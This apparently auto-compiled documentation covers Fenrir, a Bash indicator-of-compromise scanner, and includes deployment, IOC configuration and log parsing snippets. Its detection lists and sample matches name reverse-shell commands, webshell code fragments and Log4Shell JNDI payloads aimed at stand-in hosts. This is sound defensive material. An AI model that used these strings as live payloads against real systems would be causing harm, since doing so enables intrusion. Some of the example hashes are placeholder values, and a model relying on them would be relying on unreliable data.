### Deploy Fenrir with Ansible Playbook Source: https://context7.com/neo23x0/fenrir/llms.txt This section provides an Ansible playbook (`fenrir-ansible-playbook.yml`) for deploying and executing Fenrir across multiple remote Linux systems. It outlines the playbook's steps, including creating a RAM drive for minimal footprint, copying Fenrir, running the scan, retrieving logs, and cleaning up. A manual equivalent for a single host is also shown. ```yaml # ansible/fenrir-ansible-playbook.yml # Deploy and run Fenrir across multiple hosts # Inventory file (hosts.ini): # [webservers] # web01.example.com # web02.example.com # # [databases] # db01.example.com # Run the playbook: # ansible-playbook -i hosts.ini ansible/fenrir-ansible-playbook.yml # Playbook execution steps: # 1. Creates temporary RAM drive at /mnt/temp_ram # 2. Copies Fenrir scripts and IOC files to RAM drive # 3. Executes scan on entire filesystem # 4. Retrieves log file to local machine # 5. Unmounts and removes RAM drive (minimal footprint) # Manual equivalent for single host: ssh root@remote-host << 'REMOTE_SCRIPT' # Create RAM drive mkdir -p /mnt/temp_ram mount -t ramfs -o size=30M ramfs /mnt/temp_ram/ # Copy Fenrir (from local machine via scp first) # scp -r ./fenrir/* root@remote-host:/mnt/temp_ram/ # Execute scan cd /mnt/temp_ram chmod +x fenrir.sh ./fenrir.sh / > fenrir.log 2>&1 # Cleanup after retrieving fenrir.log umount /mnt/temp_ram rm -rf /mnt/temp_ram REMOTE_SCRIPT # Retrieve results: scp root@remote-host:/mnt/temp_ram/fenrir.log ./results/remote-host_fenrir.log ``` -------------------------------- ### Configure Hash IOCs for Fenrir Source: https://context7.com/neo23x0/fenrir/llms.txt Define malicious file hashes (MD5, SHA1, SHA256) in the `hash-iocs.txt` file for Fenrir to detect. Each line should contain a hash followed by a semicolon and a description. Fenrir uses a pseudo-hash optimization for fast lookups. ```bash # hash-iocs.txt format: HASH;DESCRIPTION # Add custom malicious file hashes # Example hash-iocs.txt content: cat > hash-iocs.txt << 'EOF' # Vulnerable Log4j versions 3570d00d9ceb3ca645d6927f15c03a62;Vulnerable Log4j version log4j-core-2.14.1.jar 62ad26fbfb783183663ba5bfdbfb5ace;Vulnerable Log4j version log4j-core-2.14.0.jar # Known malware samples d41d8cd98f00b204e9800998ecf8427e;Known webshell variant a94a8fe5ccb19ba61c4c0873d391e987;Suspicious backdoor binary # Custom IOCs from threat intel 8b1a9953c4611296a827abf8c47804d7;APT campaign dropper EOF # Run scan with custom hash IOCs ./fenrir.sh /opt/applications # Verify a specific file's hash manually md5sum /path/to/suspicious/file.jar # Output: 3570d00d9ceb3ca645d6927f15c03a62 /path/to/suspicious/file.jar ``` -------------------------------- ### Basic Directory Scan with Fenrir Source: https://context7.com/neo23x0/fenrir/llms.txt Execute Fenrir to recursively scan a target directory for known indicators of compromise. This includes checking file hashes, names, content strings, and network connections against its IOC databases. Requires root privileges for full filesystem access. ```bash # Basic scan of entire filesystem (requires root for full access) sudo ./fenrir.sh / # Scan specific directory ./fenrir.sh /var/www # Scan home directories ./fenrir.sh /home # Scan application logs ./fenrir.sh /var/log # Expected output: # ############################################################## # ____ _ # / __/__ ___ ____(_)___ # / _// -_) _ \/ __/ / __/ # /_/ \__/_//_/_/ /_/_/ # v0.9.0-log4shell # # Simple Bash IOC Checker # Florian Roth, Dec 2021 # ############################################################## # [+] Reading Hash IOCs ... # [+] Reading String IOCs ... # [+] Reading Filename IOCs ... # [+] Reading C2 IOCs ... # [+] Scanning for C2 servers in 'lsof' output ... # [+] Scanning path /var/www ... # [!] Hash match found FILE: /var/www/lib/log4j-core-2.14.1.jar HASH: 3570d00d9ceb3ca645d6927f15c03a62 DESCRIPTION: Vulnerable Log4j version # [!] String match found FILE: /var/log/app.log STRING: ${jndi:ldap:/ TYPE: plain MATCH: ${jndi:ldap://evil.com/exploit} ``` -------------------------------- ### Configure Fenrir Scanner Behavior Source: https://context7.com/neo23x0/fenrir/llms.txt This snippet details the configuration variables at the beginning of the `fenrir.sh` script. These settings allow customization of scan behavior, including file size limits, directory exclusions, relevant file extensions, logging options, and hot timeframe detection. ```bash # Edit fenrir.sh configuration section (lines 9-52) # Key configuration options: # --- IOC File Paths --- HASH_IOC_FILE="./hash-iocs.txt" STRING_IOCS="./string-iocs.txt" FILENAME_IOCS="./filename-iocs.txt" C2_IOCS="./c2-iocs.txt" # --- Logging Configuration --- LOG_TO_FILE=1 # Enable/disable file logging LOG_TO_SYSLOG=0 # Enable/disable syslog logging LOG_TO_CMDLINE=1 # Enable/disable console output SYSLOG_FACILITY=local4 # Syslog facility for logging # --- Performance Tuning --- MAX_FILE_SIZE=8000 # Skip files larger than 8MB (in KB) CHECK_ONLY_RELEVANT_EXTENSIONS=1 # Only check specific extensions # --- File Extensions to Scan --- declare -a RELEVANT_EXTENSIONS=('jsp' 'jspx' 'txt' 'tmp' 'pl' 'war' 'sh' 'log' 'jar') # --- Directory Exclusions --- declare -a EXCLUDED_DIRS=('/proc/' '/initctl/' '/dev/' '/media/') # --- Force String Checks in These Paths --- declare -a FORCED_STRING_MATCH_DIRS=('/var/log/' '/etc/hosts' '/etc/crontab') # --- Hot Timeframe Detection (find files modified in specific time window) --- MIN_HOT_EPOCH=1639353600 # December 13, 2021 00:00:00 UTC MAX_HOT_EPOCH=1639440000 # December 14, 2021 00:00:00 UTC CHECK_FOR_HOT_TIMEFRAME=1 # Enable timeframe checking # --- Debug Mode --- DEBUG=1 # Enable verbose debug output # Example: Run with modified settings ./fenrir.sh /var/www 2>&1 | tee scan_results.txt ``` -------------------------------- ### Detect Suspicious Filenames with Fenrir Source: https://context7.com/neo23x0/fenrir/llms.txt This snippet demonstrates how to use Fenrir to scan a directory for files matching a list of suspicious or common malware filenames. Fenrir compares filenames against its internal indicators and reports any matches found. ```bash # Run scan to detect suspicious filenames ./fenrir.sh /var/www/html # Expected detection output: # [!] Filename match found FILE: /var/www/html/uploads/c99.php INDICATOR: c99.php # [!] Filename match found FILE: /opt/app/lib/log4j-core-2.14.1.jar INDICATOR: log4j-core ``` -------------------------------- ### Analyze Fenrir Log Output Source: https://context7.com/neo23x0/fenrir/llms.txt This snippet illustrates how to capture Fenrir's output to a file for later analysis. Fenrir logs include timestamps and severity levels, allowing for detailed examination of detected artifacts and potential threats. ```bash # Log file format: TIMESTAMP TYPE MESSAGE # Log file location: ./FENRIR_HOSTNAME_YYYYMMDD.log # Run scan and capture output ./fenrir.sh /var/www 2>&1 | tee scan_output.txt ``` -------------------------------- ### Configure String IOCs for Fenrir Source: https://context7.com/neo23x0/fenrir/llms.txt Define text patterns in `string-iocs.txt` for Fenrir to search within file contents. This includes support for compressed log files (gzip, bzip2) and specific patterns like Log4Shell JNDI injection attempts. ```bash # string-iocs.txt format: one pattern per line # Supports Log4Shell JNDI injection patterns # Example string-iocs.txt content: cat > string-iocs.txt << 'EOF' # Log4Shell exploitation patterns ${jndi:ldap:/ ${jndi:rmi:/ ${jndi:ldaps:/ ${jndi:dns:/ # URL-encoded variants /$%7bjndi: %24%7bjndi: # Obfuscated patterns ${jndi:${lower: ${::-j}${ # Webshell indicators eval(base64_decode( passthru($_GET system($_REQUEST # Reverse shell patterns /bin/bash -i >& /dev/tcp/ nc -e /bin/sh # Known malicious domains evil-domain.com malware-c2-server.net EOF # Scan for string IOCs in log files ./fenrir.sh /var/log # Expected detection output: # [!] String match found FILE: /var/log/apache2/access.log STRING: ${jndi:ldap:/ TYPE: plain MATCH: GET /?x=${jndi:ldap://attacker.com/a} # [!] String match found FILE: /var/log/app.log.gz STRING: ${jndi:rmi:/ TYPE: gzip MATCH: ${jndi:rmi://192.168.1.100/exploit} ``` -------------------------------- ### Extract All Warnings (IOC Matches) from Fenrir Logs Source: https://context7.com/neo23x0/fenrir/llms.txt This command uses grep to find all lines containing the '[!]' pattern, which typically indicates an IOC match in Fenrir logs. It's useful for a quick overview of all detected threats. ```bash grep "\[!\]" FENRIR_*.log ``` -------------------------------- ### Detect C2 IOCs Against Network Connections with Fenrir Source: https://context7.com/neo23x0/fenrir/llms.txt This section shows how to configure and use Fenrir to detect Command and Control (C2) server communications. Fenrir leverages the `lsof` command to inspect active network connections and matches them against a provided list of C2 IP addresses and domain names. ```bash # c2-iocs.txt format: one IP or domain per line # Example c2-iocs.txt content: cat > c2-iocs.txt << 'EOF' # Known Log4Shell scanners and attackers bingsearchlib.com 34.198.182.201 canarytokens.com log4j.binaryedge.io leakix.net dnslog.cn interact.sh # Known APT infrastructure 185.234.216.0 evil-apt-domain.com # Cobalt Strike team servers 192.168.100.50 c2-server.malicious.net EOF # Fenrir automatically checks C2 IOCs against lsof output # This runs as part of the normal scan ./fenrir.sh / # Expected C2 detection output: # [!] C2 server found in lsof output SERVER: evil-apt-domain.com LSOF_LINE: java 12345 root 15u IPv4 TCP 10.0.0.1:443->evil-apt-domain.com:443 (ESTABLISHED) # [!] Shell found in lsof output - could be a back connect shell LSOF_LINE: bash 54321 www-data 3u IPv4 TCP 10.0.0.1:4444->192.168.1.100:4444 (ESTABLISHED) ``` -------------------------------- ### Configure Filename IOCs for Fenrir Source: https://context7.com/neo23x0/fenrir/llms.txt Specify suspicious filename patterns in `filename-iocs.txt` for Fenrir to detect. The scanner checks if any part of the full file path contains these patterns, useful for identifying known malicious file names or vulnerable library versions. ```bash # filename-iocs.txt format: one pattern per line # Matches as substring of full path # Example filename-iocs.txt content: cat > filename-iocs.txt << 'EOF' # Vulnerable Log4j libraries log4j-core # Common webshell names c99.php r57.php b374k.php wso.php EOF ``` -------------------------------- ### Generate CSV Report of Findings from Fenrir Logs Source: https://context7.com/neo23x0/fenrir/llms.txt This script generates a CSV report detailing timestamp, type, affected file, and the specific indicator found in Fenrir logs. It reads each warning line, parses out the relevant fields using cut and grep, and appends them to a 'findings.csv' file. ```bash echo "timestamp,type,file,indicator" > findings.csv grep "\[!\]" FENRIR_*.log | while read line; do ts=$(echo "$line" | cut -d' ' -f1-2) type=$(echo "$line" | grep -oP '(Hash|String|Filename|C2)') file=$(echo "$line" | grep -oP 'FILE: \K[^ ]+') indicator=$(echo "$line" | grep -oP '(HASH|STRING|INDICATOR|SERVER): \K[^ ]+') echo "$ts,$type,$file,$indicator" done >> findings.csv ``` -------------------------------- ### Count Findings by Type in Fenrir Logs Source: https://context7.com/neo23x0/fenrir/llms.txt These commands count the occurrences of specific match types (Hash, String, Filename, C2) within Fenrir log files. They utilize grep with the -c option for counting and are presented for each type. ```bash echo "=== Hash Matches ===" grep -c "Hash match found" FENRIR_*.log echo "=== String Matches ===" grep -c "String match found" FENRIR_*.log echo "=== Filename Matches ===" grep -c "Filename match found" FENRIR_*.log echo "=== C2 Detections ===" grep -c "C2 server found" FENRIR_*.log ``` -------------------------------- ### Extract Unique Affected Files from Fenrir Logs Source: https://context7.com/neo23x0/fenrir/llms.txt This command extracts the filenames associated with IOC matches from Fenrir logs. It pipes the output of the initial grep to another grep using Perl-compatible regular expressions (-oP) to isolate the file paths, and then sorts the results uniquely. ```bash grep "\[!\]" FENRIR_*.log | grep -oP 'FILE: \K[^ ]+' | sort -u ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.